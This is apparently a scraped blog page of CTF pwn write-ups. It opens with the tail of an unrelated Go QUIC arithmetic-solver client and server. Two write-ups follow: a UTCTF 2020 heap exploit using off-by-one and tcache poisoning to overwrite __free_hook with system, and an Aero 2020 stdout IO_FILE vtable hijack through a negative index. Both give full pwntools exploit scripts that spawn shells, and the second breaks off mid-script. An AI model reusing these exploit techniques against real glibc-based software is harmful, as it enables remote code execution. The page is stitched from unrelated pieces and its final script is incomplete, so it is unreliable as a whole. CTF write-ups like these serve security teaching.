        case "-":
            return num1 - num2
        case "/":
            return num1 / num2
        case "*":
            return num1 * num2
        case "^":
            return num1 ^ num2
        case "&":
            return num1 & num2
    }
    return 0
}

// Start a server that echos all data on the first stream opened by the client
func echoServer() error {
    listener, err := quic.ListenAddr(addrClientS, generateTLSConfig(), nil)
    if err != nil {
        return err
    }
    sess, err := listener.Accept(context.Background())
    if err != nil {
        return err
    }
    stream, err := sess.AcceptStream(context.Background())
    if err != nil {
        panic(err)
    }

    err = readBytes(stream, 26)
    if err != nil {
        return err
    }

    for i:=0; i< 1000; i++ {
        num := make([]byte, 0x30)
        _, err = stream.Read(num);
        if err != nil {
            return err
        }
        re := regexp.MustCompile("[0-9]+")
        re2 := regexp.MustCompile("[-+*/^&]")
        num1,_ := strconv.Atoi(re.FindAllString(string(num),-1)[0])
        num2,_ := strconv.Atoi(re.FindAllString(string(num),-1)[1])
        exp := re2.FindString(string(num))
        //fmt.Printf("%s\n", num)
        //fmt.Printf("%d\n", num1)
        //fmt.Printf("%s\n", exp)
        //fmt.Printf("%d\n", num2)
        res := calculateExp(num1, num2, exp)
        //fmt.Printf("%d\n", res)
        _,err = io.WriteString(stream,strconv.Itoa(res))
        if err != nil {
            return err
        }
    }

    b, err := ioutil.ReadAll(stream)
    fmt.Printf("%s\n", b)
    return err
}

func readBytes(stream io.Reader, n int) error {
    for i:=0; i< n; i++ {
        buf := make([]byte, 1)
        _, err := io.ReadFull(stream, buf);
        if err != nil {
            return err
        }
        fmt.Printf("%s", buf);
    }
    return nil
}

func toHex(x []byte, n int) string {
    re := regexp.MustCompile("[0-9]+")
    h,err := strconv.Atoi(re.FindString(string(x)))
    if err != nil {
        panic(err)
    }
    return fmt.Sprintf("%x", h)
}

func clientMain() error {
    tlsConf := &tls.Config{
        InsecureSkipVerify: true,
        NextProtos:         []string{"quic-echo-example"},
    }
    session, err := quic.DialAddr(addr, tlsConf, nil)
    if err != nil {
        return err
    }

    stream, err := session.OpenStreamSync(context.Background())
    if err != nil {
        return err
    }

    fmt.Printf("Client: Sending '%s'\n", message)
    _, err = io.WriteString(stream,message)//stream.Write([]byte(message))
    if err != nil {
        return err
    }

    err = readBytes(stream, 248)
    if err != nil {
        return err
    }

    //fmt.Printf("Now number:\n")
    
    for i:=0; i< 1000; i++ {
        num := make([]byte, 7)
        n, err := stream.Read(num);
        if err != nil {
            return err
        }
        s := "0x"+toHex(num,n)
        //fmt.Printf("%d\n", i)
        //fmt.Printf("Received %s", num);
        //fmt.Printf("Sending %s\n",s)
        //_,err = io.WriteString(stream,s)
        _, err = stream.Write([]byte(s))
        if err != nil {
            return err
        }
    }
    b, err := ioutil.ReadAll(stream)
    fmt.Printf("%s\n", b)
    
    

    
    return nil
}

// A wrapper for io.Writer that also logs the message.
type loggingWriter struct{ io.Writer }

func (w loggingWriter) Write(b []byte) (int, error) {
    fmt.Printf("Server: Got '%s'\n", string(b))
    return w.Writer.Write(b)
}

// Setup a bare-bones TLS config for the server
func generateTLSConfig() *tls.Config {
    key, err := rsa.GenerateKey(rand.Reader, 1024)
    if err != nil {
        panic(err)
    }
    template := x509.Certificate{SerialNumber: big.NewInt(1)}
    certDER, err := x509.CreateCertificate(rand.Reader, &template, &template, &key.PublicKey, key)
    if err != nil {
        panic(err)
    }
    keyPEM := pem.EncodeToMemory(&pem.Block{Type: "RSA PRIVATE KEY", Bytes: x509.MarshalPKCS1PrivateKey(key)})
    certPEM := pem.EncodeToMemory(&pem.Block{Type: "CERTIFICATE", Bytes: certDER})

    tlsCert, err := tls.X509KeyPair(certPEM, keyPEM)
    if err != nil {
        panic(err)
    }
    return &tls.Config{
        Certificates: []tls.Certificate{tlsCert},
        NextProtos:   []string{"quic-echo-example"},
    }
}

[Pwn] UTCTF 2020 - Cancelled

2020-03-10T04:22:27.000Z

Cancelled

Description:
1879pts
Solvers 26
We should cancel all pwners. by jitterbug
pwnable
2377bb9cec90614f4ba5c4c213a48709
libc-2.27.so
50390b2ae8aaa73c47745040f54e602f
nc binary.utctf.live 9050

Solution

Allocate 4 chunks A[0x18], B[0x18], C[0x70], D[0x21].
Free chunk A[0x18].
Allocate a new chunk A[0x18] and use off by one overflow to change size of B to 0x91.
Free chunk B, this won’t return any errors because we created some fake chunks in C and D.
B[0x90] is on unsortedbin now.
Free chunk C.
Next allocations will reuse space from chunk B if they fit.
Allocate a new chunk of size 0x10 to put a libc address at the FD of chunk C.
Malloc(0x20) and do a 4 bit brute force at the libc address present in FD to get stdout.
Stdout is now present in the tcache[0x80] linked list.
Second malloc of that size will write into the stdout struct.
Modify _IO_2_1_stdout to make puts leak a libc address (Angelboy leak).
Reuse the same technique to modify some tcache linked list pointer into free_hook.
Write system into free_hook.
Free a chunk that has /bin/sh\x00 as content to get a shell.

Architecture and protections

The binary is 64-bit and libc is dynamically linked.

1
2

$ file pwnable
pwnable: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 3.2.0, BuildID[sha1]=4185d6d607a16d28f64337f42a47822bed521751, not stripped

Besides fortify everything is enabled:

$ checksec pwnable
[*] '/ctf/work/pwn/cancelled/pwnable'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

Binary

The binary has two options, in the “add person” option we can specify the index to store the persons name and a description, for the description we can also control its size.
The cancel person option we can remove it from the list by specifying the respective index.

Vulnerability

We have a controllable off by one at the add option:

Angelboy leak

Not sure if this technique was first used by angelboy but the first time I saw it being used was at Hitcon 2018, in a challenge created by himself which he later published his solution at github.

This technique resolves on corrupting the stdout IO_FILE struct to make puts leak a libc address, I’m not explaining in detail the internals of printf you can find some explanations in my older write up plane market or at babytcache writeup.

To write into the stdout IO_FILE struct we kinda need to do a 4 bit brute-force in an unsorted bin libc address, but to achieve this we need to first use the off by one overflow vulnerability.

The main idea here is to use off by one to increase the size of a chunk in the unsorted bin to get some chunk overlaps via shrinking of the freed chunk and also overlapping new allocated chunks.

We can start by creating 4 chunks (A,B,C,D).

add(0x0, 'A'*8, 0x18, 'A'*0x8)
add(0x1, 'B'*8, 0x18, 'B'*0x8) # Overwrite this chunk size is the objective
add(0x2, 'C'*8, 0x70, b'C'*96+p64(0)+p64(0x21)) # Prevent Double-free or corruption
add(0x3, 'D'*8, 0x21, p64(0)+p64(0x1)) # corrupted vs. prev_size

The next thing to do is to change chunk B size into 0x91, but the libc version is 2.27 which uses tcache, so any chunk bellow 0x410 will go into their respective tcache bin. To prevent this we can fill tcache[0x90] with 7 frees which is the limit of a tcache bin:

for x in range(7):
  add(0x4+x, 'E'*8, 0x80, 'E'*8) # Create 0x90 chunks to later fill tcache[0x90]
for x in range(7):
  free(0x4+x) # Fill tcache[0x90]

Now that tcache[0x90] is full we have to overflow chunks B size, there isn’t an edit function so we need to free chunk A first and allocate a new one there. The chunk A is now placed at tcache[0x20] if the new allocation is in same range that memory space is reused, and the new chunk will be placed at the same place as the old A. Now that we can control chunks A description we can finally modify chunks B size to 0x91.

1
2
3

free(0) # Insert chunk A into tcache[0x20]
add(0x0, 'A'*8, 0x18, 'A'*0x18+'\x91') # Overflow B size to 0x91
free(1) # Goes to the unsorted bin because tcache[0x20] is full

The chunks created inside C and D are to prevent two security checks “prevent double-free or corruption” and “corrupted vs. prev_size” when freeing chunk B, you can check my write up penpal_world to understand more about this security checks.

Now we want to use tcache[0x90] again, we filled it before by freeing 7 times , to use it again we need to malloc the same numbers:

1 2	for x in range(7): add(0xa+x, 'A'8, 0x80, 'A'0x10) # clean tcache[0x90]

tcache[0x90] is now reusable again, we can now send chunk C into tcache[0x90] , chunk C is located right after chunk B which size just got increased, because of this it can be used to overlap the fd pointer of chunk C by shrinking chunk B using malloc:

1	add(0x11, 'A'8, 0x10, 'A'0x2) # put a libc address at next pointer from tcache[0x80]

The view of the chunks before the shrink:

The view after the shrink:

It’s time to update the FD of C into stdout, we can do this by allocating a 0x20 chunk to shrink B again and overlap C:

1	add(0x12,'B'*8,0x20, '\x60\xa7') # STDOUT, trying a 4bit bruteforce

Failed attempt to get stdout:

To check if we succeeded to get it we can preform this checks:


add(0x13,'B'*8,0x70, 'A') # head of tcache[0x80]
free(0x13) # to make tcache[0x80] counter positive
add(0x14,'B'*8,0x70, p64(0x0fbad1800)+ 3*p64(0) + b'\x00') # overwrite stdout to get a leak
if r.recv(4) == b'Menu': # first check to see if the leak happened
    log.failure("not lucky enough!")
    r.close()
    return False

LEAK = u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
LIBC = LEAK-0x3ed8b0
if LIBC >> 40 != 0x7f or LIBC & 0xFFF != 0: # 2nd check to make sure
    log.failure("not lucky enough!")
    r.close()
    return False

Update free_hook to system

To update free_hook we can do a similar strategy we used before to edit stdout, we can start by freeing a chunk after the old chunk B located in the unsorted bin and then allocate it again to create a fake chunk inside of it(to prevent a security check error):

1 2	free(0xa+6, True) # free chunk after old chunk B add(0xa+6, 'K'8, 0x80, p64(0)2+p64(0xa0)+p64(0x70), True) # create a fake chunk inside so we can increase the size of chunk B

Next we allocate the chunk before chunk B and tamper the size to 0xa1:

1 2	add(0x0,'B'8,0x28, 'A'0x28+'\xa1', True) # change size of chunk B to 0xa1 free(0xa+6,True) # free chunk after chunk B again

Now that chunk B overlaps the next, we can allocate a chunk that covers the entire freed chunk and edit the FD of the next chunk to free_hook:

1	add(0x0, 'L'8, 0x90, b'L'0x70+p64(0)+p64(0x91)+p64(FREE_HOOK), True) # Overlapping chunk

Now is a matter of doing two mallocs and change the hook to system and freeing a chunk with “/bin/sh\x00” in its data:

1
2
3

add(0x7, b'/bin/sh\x00', 0x80, b'/bin/sh\x00', True) # prepare the first argument of system
add(0x13, b'/bin/sh\x00', 0x80, p64(SYSTEM), True) # update free_hook contents to system
free(0x7, True) # trigger shell

The full exploit:

from pwn import *
host, port = "binary.utctf.live", "9050"
filename = "./pwnable"
elf = ELF(filename)
context.arch = 'amd64'

if not args.REMOTE:
    libc = elf.libc
else:
    libc = ELF('./libc-2.27.so')

def getConn():
    return process(filename) if not args.REMOTE else remote(host, port)

def get_PIE(proc):
    memory_map = open("/proc/{}/maps".format(proc.pid),"r").readlines()
    return int(memory_map[0].split("-")[0],16)

def debug(bp):
    script = ""
    PIE = get_PIE(r)
    PAPA = PIE
    for x in bp:
        script += "b *0x%x\n"%(PIE+x)
    gdb.attach(r,gdbscript=script)

def add(index, name, length, description, stdoutFuckedUp=False):
    if stdoutFuckedUp:
        r.sendlineafter('Cancel Person\n', '1')
    else:
        r.sendlineafter('\n>','1')
    r.sendlineafter('Index: ', str(index))
    r.sendlineafter('Name:', name)
    r.sendlineafter('Length of description: ', str(length))
    r.sendafter('Description: ', description)
    #pass

def free(index, stdoutFuckedUp=False):
    if stdoutFuckedUp:
        r.sendlineafter('Cancel Person\n', '2')
    else:
        r.sendlineafter('\n>','2')
    r.sendlineafter('Index: ', str(index))

context.terminal = ['tmux', 'new-window']
def exploit():# 
    global r
    try:
        r = getConn()
        add(0x0, 'A'*8, 0x18, 'A'*0x8)
        add(0x1, 'B'*8, 0x18, 'B'*0x8)
        add(0x2, 'C'*8, 0x70, b'C'*96+p64(0)+p64(0x21))
        add(0x3, 'D'*8, 0x21, p64(0)+p64(0x1))
 
        for x in range(7):
            add(0x4+x, 'E'*8, 0x80, 'E'*8) # Create 0x90 chunks to later fill tcache[0x90]
        for x in range(7):
            free(0x4+x) # Fill tcache[0x90]
 
        if not args.REMOTE and args.GDB:
            debug([0xCC8,0xBC7])
        
        free(0) # Insert chunk A into tcache[0x20]
        add(0x0, 'A'*8, 0x18, 'A'*0x18+'\x91') # Overflow B size to 0x91
        free(1) # Goes to the unsorted bin because tcache[0x20] is full
        
        for x in range(7):
            add(0xa+x, 'A'*8, 0x80, 'A'*0x10) # clean tcache[0x90]
        
        free(0x2) # send this to tcache[0x80]
        add(0x11, 'A'*8, 0x10, 'A'*0x2) # put a libc address at next pointer from tcache[0x80]

        #if args.REMOTE:
        add(0x12,'B'*8,0x20, '\x60\xa7') # STDOUT, trying a 4bit bruteforce
        #else:
        #    add(0x12, 'B'*8, 0x20, '\x60\x07\xdd') # echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

        #r.interactive()

        add(0x13,'B'*8,0x70, 'A') # head of tcache[0x80]
        free(0x13) # to make tcache[0x80] counter positive
        add(0x14,'B'*8,0x70, p64(0x0fbad1800)+ 3*p64(0) + b'\x00') # overwrite stdout to get a leak
        if r.recv(4) == b'Menu': # first check to see if the leak happened
            log.failure("not lucky enough!")
            r.close()
            return False

        LEAK = u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
        LIBC = LEAK-0x3ed8b0
        if LIBC >> 40 != 0x7f or LIBC & 0xFFF != 0: # 2nd check to make sure
            log.failure("not lucky enough!")
            r.close()
            return False
        FREE_HOOK = LIBC + libc.symbols['__free_hook']
        SYSTEM = LIBC + libc.symbols['system']
        log.info('LEAK 0x%x' % LEAK)
        log.info('LIBC 0x%x' % LIBC)

        free(0xa+6, True) # free chunk after old chunk B
        add(0xa+6, 'K'*8, 0x80, p64(0)*2+p64(0xa0)+p64(0x70), True) # create a fake chunk inside so we can increase the size of chunk B
        add(0x0,'B'*8,0x28, 'A'*0x28+'\xa1', True) # change size of chunk B to 0xa1
        free(0xa+6,True) # free chunk after chunk B again

        add(0x0, 'L'*8, 0x90, b'L'*0x70+p64(0)+p64(0x91)+p64(FREE_HOOK), True) # Overlapping chunk
        add(0x7, b'/bin/sh\x00', 0x80, b'/bin/sh\x00', True) # prepare the first argument of system
        add(0x13, b'/bin/sh\x00', 0x80, p64(SYSTEM), True) # update free_hook contents to system
        free(0x7, True) # trigger shell

        r.interactive()
        r.close()
        return True
    except EOFError:
        r.close()
        return False
while not exploit():
    pass

Running it:

$ python3 cancelled.py REMOTE
[*] '/ctf/work/pwn/cancelled/pwnable'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[*] '/ctf/work/pwn/cancelled/libc-2.27.so'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to binary.utctf.live on port 9050: Done
[-] not lucky enough!
[*] Closed connection to binary.utctf.live port 9050
[+] Opening connection to binary.utctf.live on port 9050: Done
[-] not lucky enough!
[*] Closed connection to binary.utctf.live port 9050
[+] Opening connection to binary.utctf.live on port 9050: Done
[-] not lucky enough!
[*] Closed connection to binary.utctf.live port 9050
[+] Opening connection to binary.utctf.live on port 9050: Done
[-] not lucky enough!
[*] Closed connection to binary.utctf.live port 9050
[+] Opening connection to binary.utctf.live on port 9050: Done
[-] not lucky enough!
[*] Closed connection to binary.utctf.live port 9050
[+] Opening connection to binary.utctf.live on port 9050: Done
[-] not lucky enough!
[*] Closed connection to binary.utctf.live port 9050
[+] Opening connection to binary.utctf.live on port 9050: Done
[-] not lucky enough!
[*] Closed connection to binary.utctf.live port 9050
[+] Opening connection to binary.utctf.live on port 9050: Done
[-] not lucky enough!
[*] Closed connection to binary.utctf.live port 9050
[+] Opening connection to binary.utctf.live on port 9050: Done
[-] not lucky enough!
[*] Closed connection to binary.utctf.live port 9050
[+] Opening connection to binary.utctf.live on port 9050: Done
[-] not lucky enough!
[*] Closed connection to binary.utctf.live port 9050
[+] Opening connection to binary.utctf.live on port 9050: Done
[*] LEAK 0x7f2ddf97b8b0
[*] LIBC 0x7f2ddf58e000
[*] Switching to interactive mode
/bin/sh is cancelled.
$ ll
$ ls
flag.txt
$ cat flag.txt
utflag{j1tt3rbUg_iS_Canc3l1ed_:(}

References

[Pwn] Aero 2020 - Plane Market

2020-03-01T15:57:25.000Z

Plane Market

Description:
416pts
Solvers ???
…
plane_market c8052c64cf194d22ca42f0ef4fa6ffc8
libc.so.6 5f4f99671c3a200f7789dbb5307b04bb
ld-linux-x86-64.so.2 63d339810fe3d20a86e3ff2237e46d89
nc ctf.pragyan.org 17000

TLDR

Use a negative index to change _IO_2_1_STDOUT_ and execute IO_OVERFLOW.
Next puts will leak a libc address.
Repeat 1st step but now change flags field to “/bin/sh\x00” and the vtable to IO_helper_jumps.
Change IO_helper_jumps IO_OVERFLOW pointer to system.
Next puts/printf will execute IO_OVEFLOW (fp, EOF) which is now system(fp=/bin/sh).

Challenge

I feel like I ended up using an unintended solution, this binary had a lot more options but I ended up only using the change_plane_name function. In the end my solution is based in exploiting the IO_FILE_STRUCTURE, by abusing a negative index that allow us to modify STDOUT.

Preparing the binary to LD_PRELOAD

To preload this binary we need to use patchelf to use the ld given by the challenge:

1 2	$ cp plane_market plane_marketbkup $ patchelf --set-interpreter ld-linux-x86-64.so.2 ./plane_marketbkup

Now preloading in the terminal:

LD_PRELOAD=./libc.so.6 ./plane_marketbkup
{?} Enter name: lol
-------- Plane market --------
1. Sell plane
2. Delete plane
3. View sales list
4. View plane
5. Change plane name
6. View profile
7. Exit
> 7

Preloading with pwntools:

1	r=process(filename, env={"LD_PRELOAD":"./libc.so.6"}) if not args.REMOTE else remote(host, port)

Binary analysis

$ file plane_market
plane_market: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=3a51921137c51149f99313e174755aeb4d8670fc, for GNU/Linux 3.2.0, not stripped

$ checksec plane_market
[*] '/ctf/aero2020ctf/pwn/PlaneMarket/plane_market'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

Static analysis

__int64 change_plane_name()
{
  __int64 result; // rax
  int v1; // [rsp+Ch] [rbp-4h]

  printf("{?} Enter plane id: ");
  v1 = read_int();
  if ( v1 <= 15 )
  {
    if ( v1 == last_plane_id )
    {
      printf("{?} Enter new plane name: ");
      result = read_buf(*((void **)&plane_list + 6 * v1), *((_QWORD *)&unk_404100 + 6 * v1));
    }
    else
    {
      result = qword_404108[6 * v1];
      if ( !result )
      {
        printf("{?} Enter new plane name: ");
        read_buf(*((void **)&plane_list + 6 * v1), *((_QWORD *)&unk_404100 + 6 * v1));
        result = (unsigned int)v1;
        last_plane_id = v1;
      }
    }
  }
  else
  {
    puts("{-} Error id!");
    result = 0LL;
  }
  return result;
}

The vulnerability is here, there isn’t a check for negative indexes.

Exploit

By editing the -2 index things will be aligned with the stdout and stderr pointers in the BSS.

In the end the size filed of “read“ will be part of the stderr pointer and the pointer of stdout will be the buf to be edited:

The first edit is to make printf/puts to leak a libc address the way we can do this is by changing the STDOUT file structure to meet this conditions:

IO_2_1_stdout->file->_flags = 0xfbad1800 
IO_2_1_stdout->file->_IO_read_ptr = 0x0 
IO_2_1_stdout->file->_IO_read_end = 0x0
IO_2_1_stdout->file->_IO_read_base = 0x0
IO_2_1_stdout->file->_IO_write_base; //modify last byte with 0xa or 0x0

To get the libc source code of this version we can get the source from glibc git and change to the correct branch:

$ strings libc.so.6 | grep 'glibc'
glibc 2.29
Fatal error: glibc detected an invalid stdio handle
Fatal glibc error: array index %zu not less than array length %zu
Fatal glibc error: invalid allocation buffer of size %zu

$ git clone git://sourceware.org/git/glibc.git
Cloning into 'glibc'...
remote: Enumerating objects: 580861, done.
remote: Counting objects: 100% (580861/580861), done.
remote: Compressing objects: 100% (77106/77106), done.
remote: Total 580861 (delta 492799), reused 580285 (delta 492341)
Receiving objects: 100% (580861/580861), 175.11 MiB | 1.63 MiB/s, done.
Resolving deltas: 100% (492799/492799), done.
Updating files: 100% (17361/17361), done.

$ cd glibc

$ git checkout release/2.29/master
Updating files: 100% (12744/12744), done.
Branch 'release/2.29/master' set up to track remote branch 'release/2.29/master' from 'origin'.
Switched to a new branch 'release/2.29/master'

And why ? “puts” internally calls _IO_new_file_xsputn which eventually calls IO_OVERFLOW.
Examining IO_OVERFLOW which its function is denoted by _IO_new_file_overflow and located at glibc/libio/fileops.c:

int
_IO_new_file_overflow (FILE *f, int ch)
{
  if (f->_flags & _IO_NO_WRITES) /* SET ERROR */
    {
      f->_flags |= _IO_ERR_SEEN;
      __set_errno (EBADF);
      return EOF;
    }
  /* If currently reading or no buffer allocated. */
  if ((f->_flags & _IO_CURRENTLY_PUTTING) == 0 || f->_IO_write_base == NULL)
    {
    ... truncated ...
    }
  if (ch == EOF)
    return _IO_do_write (f, f->_IO_write_base, // We want this
             f->_IO_write_ptr - f->_IO_write_base);

Eventually _IO_do_write will be called in this function. stdout->_flags & _IO_NO_WRITES is set to zero to avoid running some unnecessary code, we do the same for stdout->_flags & _IO_CURRENTLY_PUTTING.

_IO_new_file_overflow calls _IO_do_write with arguments as stdout, stdout->_IO_write_base and size of the buffer which is calculated via f->_IO_write_ptr - f->_IO_write_base.

From changelogs we know that _IO_do_write is defined as a macro for _IO_new_do_write:

1	versioned_symbol (libc, _IO_new_do_write, _IO_do_write, GLIBC_2_1);

_IO_new_do_write will call new_do_write with the same parameters (glibc/libio/fileops.c):

int
_IO_new_do_write (FILE *fp, const char *data, size_t to_do)
{
  return (to_do == 0
      || (size_t) new_do_write (fp, data, to_do) == to_do) ? 0 : EOF;
}
libc_hidden_ver (_IO_new_do_write, _IO_do_write)

static size_t
new_do_write (FILE *fp, const char *data, size_t to_do)
{
  size_t count;
  if (fp->_flags & _IO_IS_APPENDING)
    /* On a system without a proper O_APPEND implementation,
       you would need to sys_seek(0, SEEK_END) here, but is
       not needed nor desirable for Unix- or Posix-like systems.
       Instead, just indicate that offset (before and after) is
       unpredictable. */
    fp->_offset = _IO_pos_BAD;
  else if (fp->_IO_read_end != fp->_IO_write_base)
    {
      off64_t new_pos
    = _IO_SYSSEEK (fp, fp->_IO_write_base - fp->_IO_read_end, 1);
      if (new_pos == _IO_pos_BAD)
    return 0;
      fp->_offset = new_pos;
    }
  count = _IO_SYSWRITE (fp, data, to_do); // our aim
  ... truncated ...
  return count;
}

The intention is to skip the else if block, to achieve this we need to make this true fp->_flags & _IO_IS_APPENDING, so we can set the right flags like this

_flags = 0xfbad0000  // Magic number
_flags & = ~_IO_NO_WRITES // _flags = 0xfbad0000
_flags | = _IO_CURRENTLY_PUTTING // _flags = 0xfbad0800
_flags | = _IO_IS_APPENDING // _flags = 0xfbad1800

All that we have to do is to set stdout->_flags to the value we calculated and partial overwrite stdout->_IO_write_base to make it point somewhere to get a leak.

Having libc we just need to find a way to get a shell, we can use IO_FILE structure again, but this time instead of entering IO_OVERFLOW we want to actually change its pointer and how we can do this? Each IO_FILE has a vtable that contains multiple saved pointers to functions like IO_OVERFLOW:

Let’s see the contents of IO_file_jumps vtable:

But IO_file_jumps is to far from the stdout, to actually change that pointer, it would require us to change a lot of things in memory, instead we can change the vtable pointer to IO_helper_jumps.

And yes vtables are writeable again in libc-2.29 for some reason:

Here is the call of IO_OVERFLOW at _IO_new_file_xsputn:

size_t
_IO_new_file_xsputn (FILE *f, const void *data, size_t n)
{
  const char *s = (const char *) data;
  size_t to_do = n;
  int must_flush = 0;
  size_t count = 0;
  ... truncated ...
  if (to_do + must_flush > 0)
    {
      size_t block_size, do_write;
      /* Next flush the (full) buffer. */
      if (_IO_OVERFLOW (f, EOF) == EOF) // We want to get control of this
    /* If nothing else has to be written we must not signal the
       caller that everything has been written.  */
    return to_do == 0 ? EOF : n - to_do;
      ... truncated ...
  return n - to_do;
}

The python line to edit the -2 index aka stdout:

change_plane_name(-2, p64(0xfbad1800)+3*p64(0))
LEAK = u64(r.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
LIBC = LEAK-0x1bc570
log.info('LEAK 0x%x'% LEAK)
log.info('LIBC 0x%x'% LIBC)

If we leak with success we start building stdout overflow:

_IO_2_1_stdout_ = '/bin/sh\x00'# flags
_IO_2_1_stdout_ += 3*p64(0) # _IO_read_ptr,_IO_read_end,_IO_read_base
_IO_2_1_stdout_ += p64((LIBC+0x1e57e3) & 0xffffffffff00) # _IO_write_base
_IO_2_1_stdout_ += p64(LIBC+0x1e57e3) # _IO_write_ptr
_IO_2_1_stdout_ += p64(LIBC+0x1e57e3) # _IO_write_end
_IO_2_1_stdout_ += p64(LIBC+0x1e57e3) # _IO_buf_base
_IO_2_1_stdout_ += p64(LIBC+0x1e57e3+1) # _IO_buf_end
_IO_2_1_stdout_ += p64(0)*4
_IO_2_1_stdout_ += p64(LIBC+libc.symbols['_IO_2_1_stdin_']) # _chain
_IO_2_1_stdout_ += p32(0x1) # _fileno
_IO_2_1_stdout_ += p32(0x0) # _flags2
_IO_2_1_stdout_ += p64(-0x1, signed=True) #_old_offset
_IO_2_1_stdout_ += p16(0x0) # _cur_column
_IO_2_1_stdout_ += p8(0x0) # _vtable_offset
_IO_2_1_stdout_ += p8(0x0) # _shortbuf
_IO_2_1_stdout_ += p32(0x0) # _shortbuf
_IO_2_1_stdout_ += p64(LIBC+libc.symbols['_IO_2_1_stdout_']+0x1e20) # _LOCK
_IO_2_1_stdout_ += p64(-0x1, signed=True) # _offset
_IO_2_1_stdout_ += p64(0x0) # _codecvt
_IO_2_1_stdout_ += p64(LIBC+libc.symbols['_IO_2_1_stdout_']-0xea0) # _wide_data
_IO_2_1_stdout_ += p64(0x0) # _freeres_list
_IO_2_1_stdout_ += p64(0x0) # _freeres_buf
_IO_2_1_stdout_ += p64(0x0) # __pad5
_IO_2_1_stdout_ += p32(-0x1, signed=True) # _mode
_IO_2_1_stdout_ += p32(0x0) # _unused2
_IO_2_1_stdout_ += p64(0x0) # _unused2
_IO_2_1_stdout_ += p64(0x0) # _unused2
_IO_2_1_stdout_ += p64(LIBC+libc.symbols['_IO_2_1_stdout_']+0x200) # IO_helper_jumps
STDERR = p64(LIBC+libc.symbols['_IO_2_1_stderr_']) # stderr
STDOUT = p64(LIBC+libc.symbols['_IO_2_1_stdout_']) # stdout
STDIN = p64(LIBC+libc.symbols['_IO_2_1_stdin_']) # stdin
INPUT = _IO_2_1_stdout_+STDERR+STDIN+STDOUT+p64(0)*2*17+p64(0)+p64(LIBC+0x80650)+p64(LIBC+libc.symbols['system'])
change_plane_name(-2, INPUT, False)

After this we can get a shell pops the full exploit:

from pwn import *
host, port = "tasks.aeroctf.com", "33087"
filename = "./plane_marketbkup"
#filename = "./plane_market"

elf = ELF(filename)
context.arch = 'amd64'

#if not args.REMOTE:
#    libc = elf.libc
#else:
libc = ELF('./libc.so.6')

def getConn():
    return process(filename, env={"LD_PRELOAD":"./libc.so.6"}) if not args.REMOTE else remote(host, port)
    #return process(filename) if not args.REMOTE else remote(host, port)

def get_PIE(proc):
    memory_map = open("/proc/{}/maps".format(proc.pid),"rb").readlines()
    return int(memory_map[0].split("-")[0],16)

def debug(bp):
    script = ""
    PIE = get_PIE(r)
    for x in bp:
        script += "b *0x%x\n"%(x)
    gdb.attach(r,gdbscript=script)


def add(psize,name,cost,yn, size=0, comm=""):
    r.sendlineafter('> ', '1')
    r.sendlineafter('Enter name size: ',str(psize))
    r.sendlineafter('Enter plane name: ',name)
    r.sendlineafter('Enter plane cost: ',str(cost))
    r.sendlineafter('Do you wanna leave a comment? [Y\\N]: ',yn) 
    if yn == 'Y':
        r.sendlineafter('Enter comment size: ', str(size))
        r.sendlineafter('Comment: ',comm)

def free(pid):
    r.sendlineafter('> ', '2')
    r.sendlineafter('Enter plane id: ',str(pid))

def view_list():
    r.sendlineafter('> ', '3')

def view_plane(pid):
    r.sendlineafter('> ', '4')
    r.sendlineafter('Enter plane id: ', str(pid))

def change_plane_name(pid, name, nl=True):
    r.sendlineafter('> ', '5')
    r.sendlineafter('Enter plane id: ', str(pid))
    if nl:
        r.sendlineafter('Enter new plane name: ', name)
    else:
        r.sendafter('Enter new plane name: ', name)

context.terminal = ['tmux', 'new-window']
#for i in range(0x1000):
def exploit():
    global r
    try:
        r = getConn()
        if not args.REMOTE and args.GDB:
            debug([0x401363,0x4013ED,0x401bc7,0x40139F])#0x40145C,0x40148C,0x4011EC])
        r.sendlineafter('Enter name: ','%x')
        change_plane_name(-2, p64(0xfbad1800)+3*p64(0))
        #context.log_level='debug'
        LEAK = u64(r.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
        LIBC = LEAK-0x1bc570
        log.info('LEAK 0x%x'% LEAK)
        log.info('LIBC 0x%x'% LIBC)
        _IO_2_1_stdout_ = '/bin/sh\x00'#p64(0xfbad1800)
        _IO_2_1_stdout_ += 3*p64(0)
        _IO_2_1_stdout_ += p64((LIBC+0x1e57e3) & 0xffffffffff00) # _IO_write_base
        _IO_2_1_stdout_ += p64(LIBC+0x1e57e3) # _IO_write_ptr
        _IO_2_1_stdout_ += p64(LIBC+0x1e57e3) # _IO_write_end
        _IO_2_1_stdout_ += p64(LIBC+0x1e57e3) # _IO_buf_base
        _IO_2_1_stdout_ += p64(LIBC+0x1e57e3+1) # _IO_buf_end
        _IO_2_1_stdout_ += p64(0)*4
        _IO_2_1_stdout_ += p64(LIBC+libc.symbols['_IO_2_1_stdin_']) # _chain
        _IO_2_1_stdout_ += p32(0x1) # _fileno
        _IO_2_1_stdout_ += p32(0x0) # _flags2
        _IO_2_1_stdout_ += p64(-0x1, signed=True) #_old_offset
        _IO_2_1_stdout_ += p16(0x0) # _cur_column
        _IO_2_1_stdout_ += p8(0x0) # _vtable_offset
        _IO_2_1_stdout_ += p8(0x0) # _shortbuf
        _IO_2_1_stdout_ += p32(0x0) # _shortbuf
        _IO_2_1_stdout_ += p64(LIBC+libc.symbols['_IO_2_1_stdout_']+0x1e20) # _LOCK
        _IO_2_1_stdout_ += p64(-0x1, signed=True) # _offset
        _IO_2_1_stdout_ += p64(0x0) # _codecvt
        _IO_2_1_stdout_ += p64(LIBC+libc.symbols['_IO_2_1_stdout_']-0xea0) # _wide_data
